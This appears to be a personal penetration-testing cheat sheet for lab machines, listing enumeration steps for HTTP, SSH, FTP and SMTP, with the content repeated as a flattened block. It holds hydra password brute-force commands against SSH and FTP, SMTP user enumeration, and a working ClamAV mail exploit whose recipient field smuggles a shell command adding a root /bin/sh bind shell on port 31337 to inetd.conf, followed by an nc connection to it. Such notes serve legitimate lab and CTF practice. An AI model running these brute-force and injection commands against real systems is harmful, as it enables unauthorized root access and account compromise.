Manual

HTTP(s)

robots.txt

Boxe name? Like ClamAv?

source

inspect

domain?
    if found domain run scan again with domain
    DNS fuzz subdomains

HTTPS?
    if you find HTTPS, take a look at the certificate
    
nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt"

is it python?
    STI

Fuzz:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/share/wordlists/dirbuster/directories.jbrofuzz
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

SSH

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56

FTP

Anonymous login
    is the access able to upload to website?

ls -al
    to list all directory including ...
    
Bruteforce with:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56


wget -m ftp://anonymous:anonymous@192.168.234.110 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

SMTP


smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1

snmp-check 192.168.120.94

mail from:hell@gmail.com
nc -nv 192.168.89.42 31337
rcpt to: nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost

go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"

Previous$WhoAmI?NextNMAP

Last updated 3 years ago

Was this helpful?

robots.txt Boxe name? Like ClamAv? source inspect domain? if found domain run scan again with domain DNS fuzz subdomains HTTPS? if you find HTTPS, take a look at the certificate nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt" is it python? STI Fuzz: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt /usr/share/wordlists/dirb/big.txt /usr/share/wordlists/dirb/common.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt /usr/share/wordlists/dirbuster/directories.jbrofuzz /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56

Anonymous login is the access able to upload to website? ls -al to list all directory including ... Bruteforce with: hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56 wget -m ftp://anonymous:anonymous@192.168.234.110 #Donwload all wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1 smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1 snmp-check 192.168.120.94 mail from:hell@gmail.com nc -nv 192.168.89.42 31337 rcpt to: nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"